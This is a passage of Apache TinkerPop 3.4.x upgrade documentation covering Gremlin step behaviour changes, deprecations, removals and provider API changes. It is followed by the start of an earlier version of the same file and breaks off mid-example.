link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1342[TINKERPOP-1342]\n\n==== min() max() and Comparable\n\nPreviously `min()` and `max()` were only working for numeric values. This has been changed and these steps can now\noperate over any `Comparable` value. The common workaround was the combination of `order().by()` and `limit()` as\nshown here:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').order().by().limit(1) \/\/ workaround for min()\n==>josh\ngremlin> g.V().values('name').order().by(decr).limit(1) \/\/ workaround for max()\n==>vadas\n----\n\nAny attempt to use `min()` or `max()` on non-numeric values lead to an exception:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').min()\njava.lang.String cannot be cast to java.lang.Number\nType ':help' or ':h' for help.\nDisplay stack trace? [yN]\n----\n\nWith the changes in this release these kind of queries became a lot easier:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').min()\n==>josh\ngremlin> g.V().values('name').max()\n==>vadas\n----\n\n==== Nested Loop Support\n\nTraversals now support nesting of `repeat()` loops.\n\nThese can now be used to repeat another traversal while in a looped context, either inside the body of a `repeat()` or\nin its step modifiers (`until()` or `emit()`).\n\n[source,groovy]\n----\ngremlin> g.V().repeat(__.in('traverses').repeat(__.in('develops')).emit()).emit().values('name')\n==>stephen\n==>matthias\n==>marko\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-967[TINKERPOP-967]\n\n==== EventStrategy API\n\nThere were some minor modifications to how `EventStrategy` is constructed and what can be expected from events raised\nfrom the addition of new properties.\n\nWith respect to the change in terms of `EventStrategy` construction, the `detach()` builder method formerly took a\n`Class` as an argument and that `Class` was meant to be one of the various \"detachment factories\" or `null`. That\napproach was a bit confusing, so that signature has changed to `detach(EventStrategy.Detachment)` where the argument\nis a more handy enum of detachment options.\n\nAs for the changes related to events themselves, it is first worth noting that the previously deprecated\n`vertexPropertyChanged(Vertex, Property, Object, Object...)` on `MutationListener` has been removed for what should\nhave originally been the correct signature of `vertexPropertyChanged(Vertex, VertexProperty, Object, Object...)`. In\nprior versions when this method and its related `edgePropertyChanged()` and `vertexPropertyPropertyChanged()` were\ntriggered by way of the addition of a new property a \"fake\" property was included with a `null` value for the\n\"oldValue\" argument to these methods (as it did not exist prior to this event). That was a bit awkward to reason about\nwhen dealing with that event. To make this easier, the event now raises with a `KeyedVertexProperty` or\n`KeyedProperty` instance, which only contains a property key and no value in them.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1831[TINKERPOP-1831]\n\n==== Reducing Barrier Steps\n\nThe behavior of `min()`, `max()`, `mean()` and `sum()` has been modified to return no result if there's no input.\nPreviously these steps yielded the internal seed value:\n\n[source,groovy]\n----\ngremlin> g.V().values('foo').min()\n==>NaN\ngremlin> g.V().values('foo').max()\n==>NaN\ngremlin> g.V().values('foo').mean()\n==>NaN\ngremlin> g.V().values('foo').sum()\n==>0\n----\n\nThese traversals will no longer emit a result. Note, that this also affects more complex scenarios, e.g. if these\nsteps are used in `by()` modulators:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[software:0,person:3.5]\n----\n\nSince software vertices have no outgoing edges and thus no weight values to sum, `software` will no longer show up in\nthe result. In order to get the same result as before, one would have to add a `coalesce()`-step:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[person:3.5]\ngremlin> g.V().group().\n......1> by(label).\n......2> by(coalesce(outE().values(\"weight\"), constant(0)).sum())\n==>[software:0,person:3.5]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1777[TINKERPOP-1777]\n\n==== Order of select() Scopes\n\nThe order of select scopes has been changed to: maps, side-effects, paths. Previously the order was: side-effects,\nmaps, paths - which made it almost impossible to select a specific map entry if a side-effect with the same name\nexisted.\n\nThe following snippets illustrate the changed behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>[a:marko]\n----\n\nAbove is the old behavior; the second `select(\"a\")` has no effect, it selects the side-effect `a` again, although one\nwould expect to get the map entry `a`. What follows is the new behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>marko\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1522[TINKERPOP-1522]\n\n==== GraphSON BulkSet\n\nIn earlier versions of TinkerPop, `BulkSet` was coerced to a `List` for GraphSON which was convenient in that it\ndidn't add a new data type to support, but inconvenient in that it meant that certain process tests were not consistent\nin terms of how they ran and the benefits of the `BulkSet` were \"lost\" in that the \"bulk\" was being resolved server\nside. With the addition of `BulkSet` as a GraphSON type the \"bulk\" is now resolved on the client side by the language\nvariant. How that resolution occurs depends upon the language variant. For Java, there is a `BulkSet` object which\nmaintains that structure sent from the server. For the other variants, the `BulkSet` is deserialized to a `List` form\nwhich results in a much larger memory footprint than what is contained the `BulkSet`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2111[TINKERPOP-2111]\n\n==== Python Bindings\n\nBindings were formerly created using a Python 2-tuple as a bit of syntactic sugar, but all other language variants\nused an explicit `Bindings` object which `gremlin-python` already had in place. To make all work variants behave\nconsistently, the 2-tuple syntax has been removed in favor of the explicit `Bindings.of()` option.\n\n[source,python]\n----\ng.V(Bindings.of('id',1)).out('created').map(lambda: (\"it.get().value('name').length()\", \"gremlin-groovy\")).sum()\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2116[TINKERPOP-2116]\n\n==== Deprecation and Removal\n\nThis section describes newly deprecated classes, methods, components and patterns of usage as well as which previously\ndeprecated features have been officially removed or repurposed.\n\n===== Moving of RemoteGraph\n\n`RemoteGraph` was long ago deprecated in favor of `withRemote()`. It became even less useful with the introduction of\nthe `AnonymousTraversalSource` concept in 3.3.5. It's only real use was for testing remote bytecode based traversals\nin the test suite as the test suite requires an actual `Graph` object to function properly. As such, `RemoteGraph` has\nbeen moved to `gremlin-test`. It should no longer be used in any capacity besides that.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2079[TINKERPOP-2079]\n\n===== Removal of Giraph Support\n\nSupport for Giraph has been removed as of this version. There were a number of reasons for this decision which were\ndiscussed in the community prior to taking this step. Users should switch to Spark for their OLAP based graph-computing\nneeds.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1930[TINKERPOP-1930]\n\n===== Removal of Rebindings Options\n\nThe \"rebindings\" option is no longer supported for clients. It was deprecated long ago at 3.1.0. The server will not\nrespond to them on any channel - websockets, nio or HTTP. Use the \"aliases\" option instead.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1705[TINKERPOP-1705]\n\n===== gremlin-server.sh -i Removal\n\nThe `-i` option for installing dependencies in Gremlin Server was long ago deprecated and has now been removed. Please\nuse `install` as its replacement going forward.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2031[TINKERPOP-2031]\n\n===== Deprecation Removal\n\nThe following deprecated classes, methods or fields have been removed in this version:\n\n* `gremlin-core`\n** `org.apache.tinkerpop.gremlin.jsr223.ImportCustomizer#GREMLIN_CORE`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteGraph` - moved to `gremlin-test`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteConnection.submit(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteConnection.submit(Bytecode)`\n** `org.apache.tinkerpop.gremlin.process.remote.traversal.strategy.decoration.RemoteStrategy#identity()`\n** `org.apache.tinkerpop.gremlin.process.traversal.TraversalEngine`\n** `org.apache.tinkerpop.gremlin.process.traversal.engine.*`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.PartitionStrategy.Builder#addReadPartition(String)`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.SubgraphStrategy.Builder#edgeCriterion(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.SubgraphStrategy.Builder#vertexCriterion(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.map.LambdaCollectingBarrierStep.Consumers`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.util.HasContainer#makeHasContainers(String, P)`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.util.event.MutationListener#vertexPropertyChanged(Vertex, Property, Object, Object...)`\n** `org.apache.tinkerpop.gremlin.structure.Element.Exceptions#elementAlreadyRemoved(Class, Object)`\n** `org.apache.tinkerpop.gremlin.structure.Graph.Exceptions#elementNotFound(Class, Object)`\n** `org.apache.tinkerpop.gremlin.structure.Graph.Exceptions#elementNotFound(Class, Object, Exception)`\n* `gremlin-driver`\n** `org.apache.tinkerpop.gremlin.driver.Client#rebind(String)`\n** `org.apache.tinkerpop.gremlin.driver.Client.ReboundClusterdClient`\n** `org.apache.tinkerpop.gremlin.driver.Tokens#ARGS_REBINDINGS`\n* `gremlin-groovy`\n** `org.apache.tinkerpop.gremlin.groovy.jsr223.GremlinGroovyScriptEngine.close()` - no longer implements `AutoCloseable`\n* `gremlin-server`\n** `org.apache.tinkerpop.gremlin.server.GraphManager#getGraphs()`\n** `org.apache.tinkerpop.gremlin.server.GraphManager#getTraversalSources()`\n** `org.apache.tinkerpop.gremlin.server.Settings#serializedResponseTimeout`\n** `org.apache.tinkerpop.gremlin.server.Settings.AuthenticationSettings#className`\n** `org.apache.tinkerpop.gremlin.server.handler.OpSelectorHandler(Settings, GraphManager, GremlinExecutor, ScheduledExecutorService)`\n** `org.apache.tinkerpop.gremlin.server.op.AbstractOpProcessor#makeFrame(ChannelHandlerContext, RequestMessage, MessageSerializer serializer, boolean, List, ResponseStatusCode code)`\n* `hadoop-graph`\n** `org.apache.tinkerpop.gremlin.hadoop.structure.HadoopConfiguration#getGraphInputFormat()`\n** `org.apache.tinkerpop.gremlin.hadoop.structure.HadoopConfiguration#getGraphOutputFormat()`\n\nPlease see the javadoc deprecation notes or upgrade documentation specific to when the deprecation took place to\nunderstand how to resolve this breaking change.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1143[TINKERPOP-1143],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1296[TINKERPOP-1296],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1705[TINKERPOP-1705],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1707[TINKERPOP-1707],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1954[TINKERPOP-1954],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1986[TINKERPOP-1986],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2079[TINKERPOP-2079],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2103[TINKERPOP-2103]\n\n===== Deprecated GraphSONMessageSerializerGremlinV2d0\n\nThe `GraphSONMessageSerializerGremlinV2d0` serializer is now analogous to `GraphSONMessageSerializerV2d0` and therefore\nredundant. It has technically always been equivalent in terms of functionality as both serialized to the same format\n(i.e. GraphSON 2.0 with embedded types). It is no longer clear why these two classes were established this way, but\nit does carry the negative effect where multiple serializer versions could not be bound to Gremlin Server's HTTP\nendpoint as the MIME types conflicted on `application\/json`. By simply making both message serializers support\n`application\/json` and `application\/vnd.gremlin-v2.0+json`, it then became possible to overcome that limitation. In\nshort, prefer use of `GraphSONMessageSerializerV2d0` when possible.\n\nNote that this is a breaking change in the sense that `GraphSONMessageSerializerV2d0` will no longer set the header of\nrequests messages to `application\/json`. As a result, older versions of Gremlin Server not configured with\n`GraphSONMessageSerializerGremlinV2d0` will not find a deserializer to match the request.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1984[TINKERPOP-1984]\n\n===== Removed groovy-sql Dependency\n\nGremlin Console and Gremlin Server no longer include groovy-sql. If you depend on groovy-sql,\nyou can install it in Gremlin Console or Gremlin Server using the plugin system.\n\nConsole:\n```\n:install org.codehaus.groovy groovy-sql 2.5.2\n```\n\nServer:\n```\nbin\/gremlin-server.sh install org.codehaus.groovy groovy-sql 2.5.2\n```\n\nIf your project depended on groovy-sql transitively, simply include it in your project's build file (e.g. maven: pom.xml).\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2037[TINKERPOP-2037]\n\n=== Upgrading for Providers\n\n==== Graph Database Providers\n\n===== io() Step\n\nThe new `io()`-step that was introduced provides some new changes to consider. Note that `Graph.io()` has been\ndeprecated and users are no longer instructed to utilize that method. It is not yet decided when that method will be\nremoved completely, but given the public nature of it and the high chance of common usage, it should be hanging around\nfor some time.\n\nAs with any step in Gremlin, it is possible to replace it with a more provider specific implementation that could be\nmore efficient. Developing a `TraversalStrategy` to do this is encouraged, especially for those graph providers who\nmight have special bulk loaders that could be abstracted by this step. Examples of this are already shown with\n`HadoopGraph` which replaces the simple single-threaded loader with `CloneVertexProgram`. Graph providers are\nencouraged to use the `with()` step to capture any necessary configurations required for their underlying loader to\nwork. Graph providers should not feel restricted to `graphson`, `gryo` and `graphml` formats either. If a graph\nsupports CSV or some custom graph specific format, it shouldn't be difficult to gather the configurations necessary to\nmake that available to users.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1996[TINKERPOP-1996]\n\n===== Caching Graph Features\n\nFor graph implementations that have expensive creation times, it can be time consuming to run the TinkerPop test suite\nas each test run requires a `Graph` instance even if the test is ultimately ignored becaue it doesn't pass the feature\nchecks. To possibly help alleviate this problem, the `GraphProvider` interface now includes this method:\n\n[source,java]\n----\npublic default Optional<Graph.Features> getStaticFeatures() {\n return Optional.empty();\n}\n----\n\nThis method can be implemented to return a cacheable set of features for a `Graph` generated from that `GraphProvider`.\nAssuming this method is faster than the cost of creating a new `Graph` instance, the test suite should execute\nsignificantly faster depending on how many tests end up being ignored.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1518[TINKERPOP-1518]\n\n===== Configuring Interface\n\nThere were some changes to interfaces that were related to `Step`. A new `Configuring` interface was added that was\nhelpful in the implementation of the `with()`-step modulator. This new interface extends the `Parameterizing` interface\n(which moved to the `org.apache.tinkerpop.gremlin.process.traversal.step` package with the other step interfaces) and\nin turn is extended by the `Mutating` interface. Making this change meant that the `Mutating.addPropertyMutations()`\nmethod could be removed in favor of the new `Configuring.configure()` method.\n\nAll of the changes above basically mean, that if the `Mutating` interface was being used in prior versions, the\n`addPropertyMutations()` method simply needs to be changed to `configure()`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1975[TINKERPOP-1975]\n\n===== OptionsStrategy\n\n`OptionsStrategy` is a `TraversalStrategy` that makes it possible for users to set arbitrary configurations on a\n`Traversal`. These configurations can be used by graph providers to allow for traversal-level configurations to be\naccessible to their custom steps. A user would write something like:\n\n[source,java]\n----\ng.withStrategies(OptionsStrategy.build().with(\"specialLimit\", 10000).create()).V();\n----\n\nThe `OptionsStrategy` is really only the carrier for the configurations and while users can choose to utilize that\nmore verbose method for constructing it shown above, it is more elegantly constructed as follows using `with()`-step:\n\n[source,java]\n----\ng.with(\"specialLimit\", 10000)).V();\n----\n\nThe graph provider could then access that value of \"specialLimit\" in their custom step (or elsewhere) as follows:\n\n[source,java]\n----\nOptionsStrategy strategy = this.getTraversal().asAdmin().getStrategies().getStrategy(OptionsStrategy.class).get();\nint specialLimit = (int) strategy.getOptions().get(\"specialLimit\");\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2053[TINKERPOP-2053]\n\n===== Removed hadoop-gremlin Test Artifact\n\nThe `hadoop-gremlin` module no longer generates a test jar that can be used as a test dependency in other modules.\nGenerally speaking, that approach tends to be a bad practice and can cause build problems with Maven that aren't always\nobvious to troubleshoot. With the removal of `giraph-gremlin` for 3.4.0, it seemed even less useful to have this\ntest artifact present. All tests are still present. The follow provides a basic summary of how this refactoring\noccurred:\n\n* A new `AbstractFileGraphProvider` was created in `gremlin-test` which provided a lot of the features that\n`HadoopGraphProvider` was exposing. Both `HadoopGraphProvider` and `SparkHadoopGraphProvider` extend from that class\nnow.\n* `ToyIoRegistry` and related classes were moved to `gremlin-test`.\n* The various tests that validated capabilities of `Storage` have been moved to `spark-gremlin` and are part of those\ntests now. Obviously, that makes those tests specific to Spark testing now. If that location creates a problem for some\nreason, that decision can be revisited at some point.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1410[TINKERPOP-1410]\n\n===== TraversalEngine Moved\n\nThe `TraversalEngine` interface was deprecated in 3.2.0 along with all related methods that used it and classes that\nimplemented it. It was replaced by the `Computer` interface and provided a much nicer way to plug different\nimplementations of `Computer` into a traversal. `TraversalEngine` was never wholly removed however as it had some deep\ndependencies in the inner workings of the test suite. That infrastructure has largely remained as is until now.\n\nAs of 3.4.0, `TraversalEngine` is no longer in `gremlin-core` and can instead be found in `gremlin-test` as it is\neffectively a \"test-only\" component and serves no other real function. As explained in the javadocs going back to\n3.2.0, providers should implement the `Computer` class and use that instead. At this point, graph providers should have\nlong ago moved to the `Computer` infrastructure as methods for constructing a `TraversalSource` with a\n`TraversalEngine` were long ago removed.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1143[TINKERPOP-1143]\n\n===== Upsert Graph Feature\n\nSome `Graph` implementations may be able to offer upsert functionality for vertices and edges, which can help improve\nusability and performance. To help make it clear to users that a graph operates in this fashion, the `supportsUpsert()`\nfeature has been added to both `Graph.VertexFeatures` and `Graph.EdgeFeatures`. By default, both of these methods will\nreturn `false`.\n\nShould a provider wish to support this feature, the behavior of `addV()` and\/or `addE()` should change such that when\na vertex or edge with the same identifier is provided, the respective step will insert the new element if that value\nis not present or update an existing element if it is found. The method by which the provider \"identifies\" an element\nis completely up to the capabilities of that provider. In the most simple fashion, a graph could simply check the\nvalue of the supplied `T.id`, however graphs that support some form of schema will likely have other methods for\ndetermining whether or not an existing element is present.\n\nThe extent to which TinkerPop tests \"upsert\" is fairly narrow. Graph providers that choose to support this feature\nshould consider their own test suites carefully to ensure appropriate coverage.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1685[TINKERPOP-1685]\n\n===== TypeTranslator Changes\n\nThe `TypeTranslator` experienced a change in its API and `GroovyTranslator` a change in expectations.\n\n`TypeTranslator` now implements `BiFunction` and takes the graph traversal source name as an argument along with the\nobject to translate. This interface is implemented by default for Groovy with `GroovyTranslator.DefaultTypeTranslator`\nwhich encapsulates all the functionality of what `GroovyTranslator` formerly did by default. To provide customize\ntranslation, simply extend the `DefaultTypeTranslator` and override the methods.\n\n`GroovyTranslator` now expects that the `TypeTranslator` provide to it as part of its `of()` static method overload\nis \"complete\" - i.e. that it provides all the functionality to translate the types passed to it. Thus, a \"complete\"\n`TypeTranslator` is one that does everything that `DefaultTypeTranslator` does as a minimum requirement. Therefore,\nthe extension model described above is the easiest way to get going with a custom `TypeTranslator` approach.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2072[TINKERPOP-2072]\n\n==== Graph Driver Providers\n\n===== Deprecation Removal in RemoteConnection\n\nThe two deprecated synchronous `submit()` methods on the `RemoteConnection` interface have been removed, which means\nthat `RemoteConnection` implementations will need to implement `submitAsync(Bytecode)` if they have not already done\nso.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2103[TINKERPOP-2103]\n","old_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n\n= TinkerPop 3.4.0\n\nimage::https:\/\/raw.githubusercontent.com\/apache\/tinkerpop\/master\/docs\/static\/images\/avant-gremlin.png[width=225]\n\n*Avant-Gremlin Construction #3 for Theremin and Flowers*\n\n== TinkerPop 3.4.3\n\n*Release Date: NOT OFFICIALLY RELEASED YET*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.3\/CHANGELOG.asciidoc#release-3-4-3[changelog] for a complete list of all the modifications that are part of this release.\n\n\n== TinkerPop 3.4.2\n\n*Release Date: May 28, 2019*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.2\/CHANGELOG.asciidoc#release-3-4-2[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Users\n\n==== Per Request Options\n\nIn 3.4.0, the notion of `RequestOptions` were added so that users could have an easier way to configure settings on\nindividual requests made through the Java driver. While that change provided a way to set those configurations for\nscript based requests, it didn't include options to make those settings in a `Traversal` submitted via `Bytecode`. In\nthis release those settings become available via `with()` step on the `TraversalSource` as follows:\n\n[source,java]\n----\nGraphTraversalSource g = traversal().withRemote(conf);\nList<Vertex> vertices = g.with(RemoteConnection.PER_REQUEST_TIMEOUT, 500).V().out(\"knows\").toList()\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2211[TINKERPOP-2211]\n\n==== Gremlin Console Timeout\n\nThe Gremlin Console timeout that is set by `:remote config timeout x` was client-side only in prior versions, which\nmeant that if the console timeout was less than the server timeout the client would timeout but the server might still\nbe processing the request. Similarly, a longer timeout on the console would not change the server and the timeout\nwould occur sooner than expected. These discrepancies often led to confusion.\n\nAs of 3.4.0, the Java Driver API allowed for timeout settings to be more easily passed per request, so the console\nwas modified for this current version to pass the console timeout for each remote submission thus yielding more\nconsistent and intuitive behavior.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2203[TINKERPOP-2203]\n\n=== Upgrading for Providers\n\n==== Graph System Providers\n\n===== Warnings\n\nIt is now possible to pass warnings over the Gremlin Server protocol using a `warnings` status attribute. The warnings\nare expected to be a string value or a `List` of string values which can be consumed by the user or tools that check\nfor that status attribute. Note that Gremlin Console is one such tool that will respond to this status attribute - it\nwill print the messages to the console as they are detected when doing remote script submissions.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2216[TINKERPOP-2216]\n\n==== Graph Driver Providers\n\n===== GraphBinary API Change\n\nIn GraphBinary serialization, Java `write()` and `writeValue()` from `TypeSerializer<T>` interface now take a Netty's\n`ByteBuf` instance instead of an `ByteBufAllocator`, that way the same buffer instance gets reused during the write\nof a message. Additionally, we took the opportunity to remove the unused parameter from `ResponseMessageSerializer`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2161[TINKERPOP-2161]\n\n== TinkerPop 3.4.1\n\n*Release Date: March 18, 2019*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.1\/CHANGELOG.asciidoc#release-3-4-1[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Users\n\n==== Mix SPARQL and Gremlin\n\nIn the initial release of `sparql-gremlin` it was only possible to execute a SPARQL query and have it translate to\nGremlin. Therefore, it was only possible to write a query like this:\n\n[source,text]\n----\ngremlin> g.sparql(\"SELECT ?name ?age WHERE { ?person v:name ?name . ?person v:age ?age }\")\n==>[name:marko,age:29]\n==>[name:vadas,age:27]\n==>[name:josh,age:32]\n==>[name:peter,age:35]\ngremlin> g.sparql(\"SELECT * WHERE { }\")\n==>v[1]\n==>v[2]\n==>v[3]\n==>v[4]\n==>v[5]\n==>v[6]\n----\n\nIn this release, however, it is now possible to further process that result with Gremlin steps:\n\n[source,text]\n----\ngremlin> g.sparql(\"SELECT ?name ?age WHERE { ?person v:name ?name . ?person v:age ?age }\").select(\"name\")\n==>marko\n==>vadas\n==>josh\n==>peter\ngremlin> g.sparql(\"SELECT * WHERE { }\").out(\"knows\").values(\"name\")\n==>vadas\n==>josh\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2171[TINKERPOP-2171],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.1\/reference\/#sparql-with-gremlin[Reference Documentation]\n\n=== Upgrading for Providers\n\n==== Graph Database Providers\n\n===== GraphBinary Serializer Changes\n\nIn GraphBinary serialization, Java `write()` and `writeValue()` from `TypeSerializer<T>` interface now take a Netty's\n`ByteBuf` instance instead of an `ByteBufAllocator`, that way the same buffer instance gets reused during the write\nof a message. Additionally, we took the opportunity to remove the unused parameter from `ResponseMessageSerializer`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2161[TINKERPOP-2161]\n\n== TinkerPop 3.4.0\n\n*Release Date: January 2, 2019*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.0\/CHANGELOG.asciidoc#release-3-4-0[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Users\n\n==== sparql-gremlin\n\nThe `sparql-gremlin` module is a link:https:\/\/en.wikipedia.org\/wiki\/SPARQL[SPARQL] to Gremlin compiler, which allows\nSPARQL to be executed over any TinkerPop-enabled graph system.\n\n[source,groovy]\n----\ngraph = TinkerFactory.createModern()\ng = graph.traversal(SparqlTraversalSource)\ng.sparql(\"\"\"SELECT ?name ?age\n WHERE { ?person v:name ?name . ?person v:age ?age }\n ORDER BY ASC(?age)\"\"\")\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1878[TINKERPOP-1878],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#sparql-gremlin[Reference Documentation]\n\n==== Gremlin.NET Driver Improvements\n\nThe Gremlin.NET driver now uses request pipelining. This allows connections to be reused for different requests in\nparallel which should lead to better utilization of connections. The `ConnectionPool` now also has a fixed size\nwhereas it could previously create an unlimited number of connections. Each `Connection` can handle up to\n`MaxInProcessPerConnection` requests in parallel. If this limit is reached for all connections, then a\n`NoConnectionAvailableException` is thrown which makes this a breaking change.\n\nThese settings can be set as properties on the `ConnectionPoolSettings` instance that can be passed to the `GremlinClient`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1774[TINKERPOP-1774],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1775[TINKERPOP-1775],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#_connection_pool[Reference Documentation]\n\n==== Indexing of Collections\n\nTinkerPop 3.4.0 adds a new `index()`-step, which allows users to transform simple collections into index collections or maps.\n\n```\ngremlin> g.V().hasLabel(\"software\").values(\"name\").fold().\n......1> order(local).\n......2> index().unfold()\n==>[lop,0]\n==>[ripple,1]\ngremlin> g.V().hasLabel(\"person\").values(\"name\").fold().\n......1> order(local).by(decr).\n......2> index().\n......3> with(WithOptions.indexer, WithOptions.map)\n==>[0:vadas,1:peter,2:marko,3:josh]\n```\n\n==== Modulation of valueMap()\n\nThe `valueMap()` step now supports `by` and `with` modulation, which also led to the deprecation of `valueMap(true)` overloads.\n\n===== by() Modulation\n\nWith the help of the `by()` modulator `valueMap()` result values can now be adjusted, which is particularly useful to turn multi-\/list-values into single values.\n\n```\ngremlin> g.V().hasLabel(\"person\").valueMap()\n==>[name:[marko],age:[29]]\n==>[name:[vadas],age:[27]]\n==>[name:[josh],age:[32]]\n==>[name:[peter],age:[35]]\ngremlin> g.V().hasLabel(\"person\").valueMap().by(unfold())\n==>[name:marko,age:29]\n==>[name:vadas,age:27]\n==>[name:josh,age:32]\n==>[name:peter,age:35]\n```\n===== with() Modulation\n\nThe `with()` modulator can be used to include certain tokens (`id`, `label`, `key` and\/or `value`).\n\nThe old way (still valid, but deprecated):\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap(true)\n==>[id:10,label:software,name:[gremlin]]\n==>[id:11,label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap(true)\n==>[id:6,key:location,value:san diego,startTime:1997,endTime:2001]\n==>[id:7,key:location,value:santa cruz,startTime:2001,endTime:2004]\n==>[id:8,key:location,value:brussels,startTime:2004,endTime:2005]\n==>[id:9,key:location,value:santa fe,startTime:2005]\n```\n\nThe new way:\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap().with(WithOptions.tokens)\n==>[id:10,label:software,name:[gremlin]]\n==>[id:11,label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap().with(WithOptions.tokens)\n==>[id:6,key:location,value:san diego,startTime:1997,endTime:2001]\n==>[id:7,key:location,value:santa cruz,startTime:2001,endTime:2004]\n==>[id:8,key:location,value:brussels,startTime:2004,endTime:2005]\n==>[id:9,key:location,value:santa fe,startTime:2005]\n```\n\nFurthermore, now there's a finer control over which of the tokens should be included:\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap().with(WithOptions.tokens, 